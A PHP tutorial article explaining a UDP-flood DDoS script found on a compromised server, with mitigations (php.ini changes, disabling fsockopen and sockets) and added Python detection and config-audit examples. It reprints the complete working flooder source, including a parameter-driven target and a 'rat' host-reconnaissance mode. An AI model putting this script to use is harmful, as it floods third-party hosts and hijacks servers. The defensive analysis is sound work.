Solution to a PHP DDoS attack (the server sends a large number of data packets to the external network)

WBOY
Release: 2016-07-20 11:10:29

Today, one of my machines suddenly started sending a large number of data packets to the outside world, more than 1G per second. Although I used a policy to prohibit UDP packets, so they could not actually be sent out, it still took up a lot of CPU, so I finally found a way to solve it.

Look at the source code first

The code is as follows

set_time_limit(999999);        // effectively removes the execution time limit
$host = $_GET['host'];         // target, port and duration all come from the request
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);       // keeps running after the HTTP client disconnects

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
    if (StrLen($_GET['rat'])<>0){
        // "rat" request: reports host name, IP, OS and server software to the caller
        echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
        exit;
    }
    echo "Parameters can not be empty!";
    exit;
}

// builds the 65535-byte payload
for($i=0;$i<$Sendlen;$i++){
    $out .= "A";
}

$max_time = time()+$exec_time;

// opens a UDP socket and writes the payload until the requested time is up
while(1){
    $packets++;
    if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if($fp){
        fwrite($fp, $out);
        fclose($fp);
    }
}

// reports the totals back to whoever made the request
echo "Send Host:$host:$port

";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb

";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>
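The traits of the script above (a udp:// fsockopen call, an effectively unlimited time limit, ignore_user_abort, request-supplied target, endless loop) can be turned into a sweep of the web root for other copies. This is an added example, not part of the original article; the indicator names, the three-hit threshold and the two sample files are assumptions constructed here.

```python
import re
import tempfile
from pathlib import Path

# Traits of the flooder shown above, as regexes over PHP source text.
INDICATORS = {
    "udp_fsockopen": re.compile(r"fsockopen\s*\(\s*[\"']udp://", re.I),
    "huge_time_limit": re.compile(r"set_time_limit\s*\(\s*(0|\d{4,})\s*\)", re.I),
    "ignore_abort": re.compile(r"ignore_user_abort\s*\(\s*(true|1)\s*\)", re.I),
    "request_target": re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*[\"'](host|port|time)[\"']"),
    "endless_loop": re.compile(r"while\s*\(\s*(1|true)\s*\)", re.I),
}

def indicators_in(source):
    """Names of the indicators present in one PHP source string, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))

def is_flooder(hits):
    """A UDP fsockopen call is required; two further traits make it a finding."""
    return "udp_fsockopen" in hits and len(hits) >= 3

def scan_webroot(root):
    """Return {relative path: hits} for PHP files under root that look like the flooder."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = indicators_in(path.read_text(errors="replace"))
        if is_flooder(hits):
            findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed samples: only the trait lines of the script above, and a benign mailer.
FLOODER = '''<?php set_time_limit(999999); ignore_user_abort(True);
$host = $_GET['host']; while(1){ $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); }'''
MAILER = '''<?php set_time_limit(30);
$fp = fsockopen("tcp://mail.example.test", 25, $errno, $errstr, 5);'''

def demo():
    """Write both samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "uploads").mkdir()
        (Path(root) / "uploads" / "img.php").write_text(FLOODER)
        (Path(root) / "mail.php").write_text(MAILER)
        return scan_webroot(root)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Requiring the UDP call plus two other traits keeps ordinary mail or API code that uses fsockopen over TCP out of the results.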

The key code is

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

The method is very simple: send UDP packets to the target host inside an infinite loop, which creates heavy load. That load falls first on the server that executes the script, because the script consumes a lot of that server's own network bandwidth, CPU and other resources. To put pressure on a target site with this script, it has to be executed on multiple servers at once, which is what makes it a DDoS.

Since the script uses fsockopen to make requests to the outside, do not let it make them. Set in php.ini

The code is as follows
allow_url_fopen = Off

If it can still send packets after that, change

The code is as follows
extension=php_sockets.dll
to
;extension=php_sockets.dll

Restart Apache, IIS or Nginx.
This can prevent the PHP DDoS script from sending packets.

Other netizens said

It is very simple to stop the script from running without a timeout: 1. Disable the set_time_limit function; 2. Enable PHP's safe mode (safe_mode=on).

To disable the socket functions, you can either disable the whole socket module or disable just the fsockopen function. Because sockets are commonly used to send password-recovery emails, it is recommended to turn on safe mode directly instead. In that case, however, the script will time out every 30 seconds. It is estimated that no "hacker" is lonely enough to click to start the DDoS every 30 seconds...
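The php.ini changes from the article and the function blocking suggested in the comments above can be checked mechanically against a server's configuration. This is an added example, not part of the original article: it assumes functions are blocked through php.ini's disable_functions directive, and it adds pfsockopen and stream_socket_client (not named on the page) because they open udp:// streams as well. fsockopen belongs to PHP's core rather than to the sockets extension, so the disable_functions check is the one that covers the call in the script; the three ini fragments are constructed.

```python
import re

# Functions the article and the quoted comments say to block. pfsockopen and
# stream_socket_client are additions made here: they open udp:// streams too.
WANT_DISABLED = {"fsockopen", "pfsockopen", "stream_socket_client", "set_time_limit"}

def parse_ini(text):
    """Return (directives, extensions) from php.ini text; ';' starts a comment."""
    directives, extensions = {}, []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue  # blank lines, comments and [section] headers
        key, value = (part.strip().strip('"') for part in line.split("=", 1))
        if key.lower() == "extension":
            extensions.append(value.lower())
        else:
            directives[key.lower()] = value
    return directives, extensions

def audit(text):
    """List findings for the settings discussed in this article."""
    directives, extensions = parse_ini(text)
    findings = []
    # allow_url_fopen defaults to On when the directive is absent
    if directives.get("allow_url_fopen", "1").lower() in ("1", "on", "true", "yes"):
        findings.append("allow_url_fopen is On")
    if any(re.fullmatch(r"(php_)?sockets(\.dll|\.so)?", ext) for ext in extensions):
        findings.append("sockets extension is loaded")
    disabled = {f.strip().lower() for f in directives.get("disable_functions", "").split(",")}
    findings += [f"{name} not in disable_functions" for name in sorted(WANT_DISABLED - disabled)]
    return findings

# Constructed php.ini fragments: the starting state, the article's two changes,
# and the article's changes together with the commenters' function blocking.
DEFAULT_INI = "allow_url_fopen = On\nextension=php_sockets.dll\n"
ARTICLE_INI = "allow_url_fopen = Off\n;extension=php_sockets.dll\n"
FULL_INI = ARTICLE_INI + "disable_functions = fsockopen,pfsockopen,stream_socket_client,set_time_limit\n"

if __name__ == "__main__":
    for label, ini in (("default", DEFAULT_INI), ("article", ARTICLE_INI), ("full", FULL_INI)):
        print(label, audit(ini))
```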

Experience: This kind of problem is usually caused by weak website security. We should pay attention to the security of both the website and the server, so that they are not easily invaded. If you know how to use McAfee, using it to restrict the website is even better.


source:php.cn